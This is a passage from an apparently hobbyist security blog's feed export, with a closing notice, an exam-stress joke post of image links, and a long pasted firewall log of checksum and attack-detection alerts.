tag:blogger.com,1999:blog-19229878208815449072012-02-16T16:45:27.690-08:00Blaze Company Security CentrePlace for security , threats and softwares.Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.comBlogger661100tag:blogger.com,1999:blog-1922987820881544907.post-48945855424992322572008-01-06T00:35:00.000-08:002008-01-06T00:36:06.587-08:00This Blog Is ClosedNew Site<br /><br />http://blazecompany.googlepages.com/<br />http://blazeco.info/<br />http://hk.geocities.com/edwinchiu1995/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-4894585542499232257?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-32689062683459712932007-11-29T23:28:00.001-08:002007-11-29T23:28:55.701-08:00LoL..New school semester:<br />[img]http://img440.imageshack.us/img440/6066/38724042xy1.gif[/img]<br /><br />At the first week:<br />[img]http://img169.imageshack.us/img169/9471/46022718qw0.gif[/img]<br /><br />At the second week:<br />[img]http://img169.imageshack.us/img169/1579/73860124hh9.gif[/img]<br /><br />Before the mid-term test:<br />[img]http://img169.imageshack.us/img169/7742/70248010qy8.gif[/img]<br /><br />During the mid-term test:<br />[img]http://img169.imageshack.us/img169/1148/51684533rb1.gif[/img]<br /><br />After the mid-term test:<br />[img]http://img440.imageshack.us/img440/4443/16593617tz0.gif[/img]<br /><br />Before the final exam:<br />[img]http://img440.imageshack.us/img440/64/58696569yj2.gif[/img]<br /><br />Once know the final exam schedule:<br />[img]http://img440.imageshack.us/img440/4100/98267951hr5.gif[/img]<br /><br />7 days before final exam:<br />[img]http://img440.imageshack.us/img440/6928/14179412xo6.gif[/img]<br /><br />6 days before final exam:<br />[img]http://img167.imageshack.us/img167/7886/48449407ge9.gif[/img]<br /><br />5 days before final exam:<br />[img]http://img167.imageshack.us/img167/6201/36556418yj2.gif[/img]<br /><br />4 days before final exam:<br />[img]http://img521.imageshack.us/img521/4811/15410495gt7.gif[/img]<br /><br />3 days before final exam:<br />[img]http://img521.imageshack.us/img521/1455/61370226jb0.gif[/img]<br /><br />2 days before final exam:<br />[img]http://img264.imageshack.us/img264/8502/82556919ec0.gif[/img]<br /><br />1 day before final exam:<br />[img]http://img264.imageshack.us/img264/2495/12551693jd2.gif[/img]<br /><br />A night before final exam:<br />[img]http://img258.imageshack.us/img258/1089/83771123fm7.gif[/img]<br /><br />1 hour before final exam:<br />[img]http://img258.imageshack.us/img258/8236/97461205gx4.gif[/img]<br /><br />During the final exam:<br />[img]http://img258.imageshack.us/img258/1935/57547119kr6.gif[/img]<br /><br />Once walk out from the exam hall:<br />[img]http://img258.imageshack.us/img258/4185/29551892mq5.gif[/img]<br /><br />After the final exam, during the holiday:<br />[img]http://img165.imageshack.us/img165/4364/35787142dz1.gif[/img]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-3268906268345971293?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-88181567578449658122007-11-22T17:03:00.001-08:002007-11-22T17:04:12.332-08:00Detected Firewall AttackIn our test account and test computer , we found a lot of in<br /><br />21/11/2007 20:02:44 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:40 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:40 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:40 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:40 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:40 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:40 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:39 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:39 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:39 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:39 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:39 Incorrect IP packet checksum 0 <br />21/11/2007 20:02:39 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:34 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:28 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:28 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:27 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:27 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:27 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:27 Incorrect IP packet checksum 0 <br />21/11/2007 18:35:27 Incorrect IP packet checksum 0 <br />21/11/2007 16:41:21 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:44 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:38 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:38 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:03:37 Incorrect IP packet checksum 0 <br />21/11/2007 16:02:21 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:15 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:11 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:11 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:11 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:11 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:11 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:10 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:10 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:10 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:10 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:10 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:09 Incorrect IP packet checksum 0 <br />21/11/2007 16:01:09 Incorrect IP packet checksum 0 <br />21/11/2007 15:57:02 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:36 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:27 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:27 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:26 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:26 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:26 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:26 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:26 Incorrect IP packet checksum 0 <br />21/11/2007 15:42:26 Incorrect IP packet checksum 0 <br />21/11/2007 15:40:37 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:49 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:47 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:47 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:47 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:47 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:47 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:47 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:46 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:46 Incorrect IP packet checksum 0 <br />21/11/2007 15:39:46 Incorrect IP packet checksum 0 <br />21/11/2007 15:37:41 Incorrect IP packet checksum 0 <br />21/11/2007 15:31:00 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:50 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:50 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:50 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:50 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:50 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:50 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:49 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:49 Incorrect IP packet checksum 0 <br />21/11/2007 15:30:49 Incorrect IP packet checksum 0 <br />21/11/2007 15:29:01 Incorrect IP packet checksum 0 <br />21/11/2007 15:15:55 Incorrect IP packet checksum 0 <br />21/11/2007 15:15:55 Incorrect IP packet checksum 0 <br />21/11/2007 15:15:55 Incorrect IP packet checksum 0 <br />21/11/2007 15:15:54 Incorrect IP packet checksum 0 <br />21/11/2007 15:15:54 Incorrect IP packet checksum 0 <br />21/11/2007 15:15:54 Incorrect IP packet checksum 0 <br />21/11/2007 15:13:49 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:13 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:09 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:09 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:08 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:08 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:08 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:08 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:08 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:08 Incorrect IP packet checksum 0 <br />21/11/2007 15:06:07 Incorrect IP packet checksum 0 <br />21/11/2007 14:53:44 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:56 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:48 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:48 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:48 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:48 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:48 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:48 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:47 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:47 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:46 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:46 Incorrect IP packet checksum 0 <br />21/11/2007 14:40:46 Incorrect IP packet checksum 0 <br />21/11/2007 14:37:00 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:34 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:24 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:24 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:23 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:23 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:23 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:23 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:23 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:22 Incorrect IP packet checksum 0 <br />21/11/2007 14:29:22 Incorrect IP packet checksum 0 <br />21/11/2007 14:27:32 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:39 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:34 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:34 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:33 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:33 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:33 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:33 Incorrect IP packet checksum 0 <br />21/11/2007 14:17:33 Incorrect IP packet checksum 0 <br />21/11/2007 14:12:22 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:45 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 14:04:42 Incorrect IP packet checksum 0 <br />21/11/2007 13:57:06 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:32 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:27 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:27 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:27 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:26 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:26 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:26 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:25 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:25 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:25 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:24 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:24 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:24 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:24 Incorrect IP packet checksum 0 <br />21/11/2007 13:48:24 Incorrect IP packet checksum 0 <br />20/11/2007 22:42:30 Incorrect IP packet checksum 0 <br />20/11/2007 22:42:26 Incorrect IP packet checksum 0 <br />20/11/2007 22:42:26 Incorrect IP packet checksum 0 <br />20/11/2007 22:42:26 Incorrect IP packet checksum 0 <br />20/11/2007 15:44:41 Incorrect IP packet checksum 0 <br />20/11/2007 15:44:35 Incorrect IP packet checksum 0 <br />20/11/2007 15:44:34 Incorrect IP packet checksum 0 <br />20/11/2007 15:44:34 Incorrect IP packet checksum 0 <br />20/11/2007 15:39:17 Incorrect IP packet checksum 0 <br />20/11/2007 15:39:10 Incorrect IP packet checksum 0 <br />20/11/2007 15:39:09 Incorrect IP packet checksum 0 <br />20/11/2007 15:39:09 Incorrect IP packet checksum 0 <br />20/11/2007 15:30:12 Incorrect IP packet checksum 0 <br />20/11/2007 15:30:05 Incorrect IP packet checksum 0 <br />20/11/2007 15:30:04 Incorrect IP packet checksum 0 <br />20/11/2007 15:30:04 Incorrect IP packet checksum 0 <br />20/11/2007 15:30:04 Incorrect IP packet checksum 0 <br />19/11/2007 22:44:17 Incorrect IP packet checksum 0 <br />19/11/2007 22:42:37 Incorrect IP packet checksum 0 <br />19/11/2007 22:42:36 Incorrect IP packet checksum 0 <br />19/11/2007 22:42:36 Incorrect IP packet checksum 0 <br />19/11/2007 22:42:36 Incorrect IP packet checksum 0 <br />19/11/2007 22:42:36 Incorrect IP packet checksum 0 <br />19/11/2007 22:42:36 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:44 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:28 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:25 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:25 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:25 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:25 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:25 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:24 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:24 Incorrect IP packet checksum 0 <br />19/11/2007 20:54:24 Incorrect IP packet checksum 0 <br />19/11/2007 20:44:54 Incorrect IP packet checksum 0 <br />19/11/2007 19:22:21 Incorrect IP packet checksum 0 <br />19/11/2007 19:22:17 Incorrect IP packet checksum 0 <br />19/11/2007 19:22:17 Incorrect IP packet checksum 0 <br />19/11/2007 19:22:17 Incorrect IP packet checksum 0 <br />19/11/2007 19:22:17 Incorrect IP packet checksum 0 <br />19/11/2007 19:22:17 Incorrect IP packet checksum 0 <br />18/11/2007 22:14:11 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:56 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:54 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:54 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:53 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:53 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:53 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:53 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:53 Incorrect IP packet checksum 0 <br />18/11/2007 22:13:33 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:42 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:34 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:33 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:33 Incorrect IP packet checksum 0 <br />18/11/2007 22:07:33 Incorrect IP packet checksum 0 <br />18/11/2007 22:02:38 Incorrect IP packet checksum 0 <br />18/11/2007 21:35:47 Incorrect IP packet checksum 0 <br />18/11/2007 21:35:44 Incorrect IP packet checksum 0 <br />18/11/2007 21:35:44 Incorrect IP packet checksum 0 <br />18/11/2007 21:35:44 Incorrect IP packet checksum 0 <br />18/11/2007 21:35:44 Incorrect IP packet checksum 0 <br />18/11/2007 21:35:43 Incorrect IP packet checksum 0 <br />18/11/2007 18:17:06 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:59 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:59 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:58 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:58 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:57 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:57 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:57 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:57 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:57 Incorrect IP packet checksum 0 <br />18/11/2007 18:16:12 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:11 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:11 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:11 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:10 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:10 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:10 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:10 Incorrect IP packet checksum 0 <br />18/11/2007 17:17:10 Incorrect IP packet checksum 0 <br />18/11/2007 15:53:34 Incorrect IP packet checksum 0 <br />18/11/2007 15:46:38 Incorrect IP packet checksum 0 <br />18/11/2007 15:46:33 Incorrect IP packet checksum 0 <br />18/11/2007 15:46:33 Incorrect IP packet checksum 0 <br />18/11/2007 15:46:32 Incorrect IP packet checksum 0 <br />18/11/2007 15:46:32 Incorrect IP packet checksum 0 <br />18/11/2007 15:46:32 Incorrect IP packet checksum 0 <br />18/11/2007 13:53:58 Detected Reverse TCP Desynchronization attack 61.18.45.12:3506 192.168.2.5:51481 TCP <br />18/11/2007 13:06:30 Incorrect IP packet checksum 0 <br />18/11/2007 13:02:04 Incorrect IP packet checksum 0 <br />18/11/2007 13:02:03 Incorrect IP packet checksum 0 <br />18/11/2007 13:02:03 Incorrect IP packet checksum 0 <br />18/11/2007 13:02:03 Incorrect IP packet checksum 0 <br />18/11/2007 13:02:03 Incorrect IP packet checksum 0 <br />18/11/2007 13:02:02 Incorrect IP packet checksum 0 <br />17/11/2007 22:15:11 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:22 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:13 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:13 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:12 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:12 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:12 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:12 Incorrect IP packet checksum 0 <br />17/11/2007 21:58:11 Incorrect IP packet checksum 0 <br />17/11/2007 21:34:40 Incorrect IP packet checksum 0 <br />17/11/2007 21:22:06 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:56 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:56 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:56 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:56 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:55 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:55 Incorrect IP packet checksum 0 <br />17/11/2007 21:21:55 Incorrect IP packet checksum 0 <br />17/11/2007 20:11:59 Incorrect IP packet checksum 0 <br />17/11/2007 20:05:04 Incorrect IP packet checksum 0 <br />17/11/2007 20:05:01 Incorrect IP packet checksum 0 <br />17/11/2007 20:05:01 Incorrect IP packet checksum 0 <br />17/11/2007 20:05:00 Incorrect IP packet checksum 0 <br />17/11/2007 20:05:00 Incorrect IP packet checksum 0 <br />17/11/2007 20:05:00 Incorrect IP packet checksum 0 <br />17/11/2007 0:21:01 Incorrect IP packet checksum 0 <br />17/11/2007 0:21:01 Incorrect IP packet checksum 0 <br />17/11/2007 0:21:01 Incorrect IP packet checksum 0 <br />17/11/2007 0:21:01 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:33 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:24 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:24 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:24 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:24 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:23 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:23 Incorrect IP packet checksum 0 <br />16/11/2007 22:54:23 Incorrect IP packet checksum 0 <br />16/11/2007 22:49:56 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:42 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:40 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:40 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:39 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:39 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:39 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:39 Incorrect IP packet checksum 0 <br />16/11/2007 22:23:39 Incorrect IP packet checksum 0 <br />16/11/2007 22:12:05 Incorrect IP packet checksum 0 <br />16/11/2007 21:44:13 Incorrect IP packet checksum 0 <br />16/11/2007 21:44:09 Incorrect IP packet checksum 0 <br />16/11/2007 21:44:09 Incorrect IP packet checksum 0 <br />16/11/2007 21:44:09 Incorrect IP packet checksum 0 <br />16/11/2007 21:44:09 Incorrect IP packet checksum 0 <br />16/11/2007 21:44:09 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:41 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:33 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:33 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:33 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:33 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:32 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:32 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:32 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:32 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:32 Incorrect IP packet checksum 0 <br />16/11/2007 18:24:30 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:51 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:46 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:46 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:46 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:46 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:45 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:45 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:45 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:45 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:45 Incorrect IP packet checksum 0 <br />16/11/2007 18:12:44 Incorrect IP packet checksum 0 <br />16/11/2007 18:11:49 Incorrect IP packet checksum 0 <br />16/11/2007 18:11:46 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:21 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:18 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:09 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:09 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:09 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:09 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 18:06:08 Incorrect IP packet checksum 0 <br />16/11/2007 15:37:33 Detected ARP cache poisoning attack 0 <br />16/11/2007 14:56:01 Incorrect IP packet checksum 0 <br />16/11/2007 14:55:57 Incorrect IP packet checksum 0 <br />16/11/2007 14:55:56 Incorrect IP packet checksum 0 <br />16/11/2007 14:55:56 Incorrect IP packet checksum 0 <br />16/11/2007 14:55:56 Incorrect IP packet checksum 0 <br />16/11/2007 14:55:56 Incorrect IP packet checksum 0 <br />16/11/2007 14:55:52 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:54 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:48 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:48 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:48 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:48 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:47 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:47 Incorrect IP packet checksum 0 <br />16/11/2007 14:13:47 Incorrect IP packet checksum 0 <br />16/11/2007 14:10:09 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:48 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:47 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:47 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 14:09:46 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:50 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:50 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:50 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:49 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:49 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:49 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:49 Incorrect IP packet checksum 0 <br />16/11/2007 12:54:49 Incorrect IP packet checksum 0 <br />16/11/2007 11:45:52 Incorrect IP packet checksum 0 <br />16/11/2007 11:38:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:38:12 Incorrect IP packet checksum 0 <br />16/11/2007 11:38:12 Incorrect IP packet checksum 0 <br />16/11/2007 11:38:11 Incorrect IP packet checksum 0 <br />16/11/2007 11:38:11 Incorrect IP packet checksum 0 <br />16/11/2007 11:38:11 Incorrect IP packet checksum 0 <br />16/11/2007 11:31:22 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:15 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:07 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:07 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:06 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:06 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:06 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:06 Incorrect IP packet checksum 0 <br />16/11/2007 11:26:06 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:33 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:03 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:02 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:02 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:01 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:01 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:01 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:01 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:01 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:01 Incorrect IP packet checksum 0 <br />16/11/2007 11:22:00 Incorrect IP packet checksum 0 <br />16/11/2007 11:18:30 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:23 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />16/11/2007 11:13:13 Incorrect IP packet checksum 0 <br />15/11/2007 21:32:44 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:16 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:12 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:12 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:11 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:11 Incorrect IP packet checksum 0 <br />15/11/2007 21:17:11 Incorrect 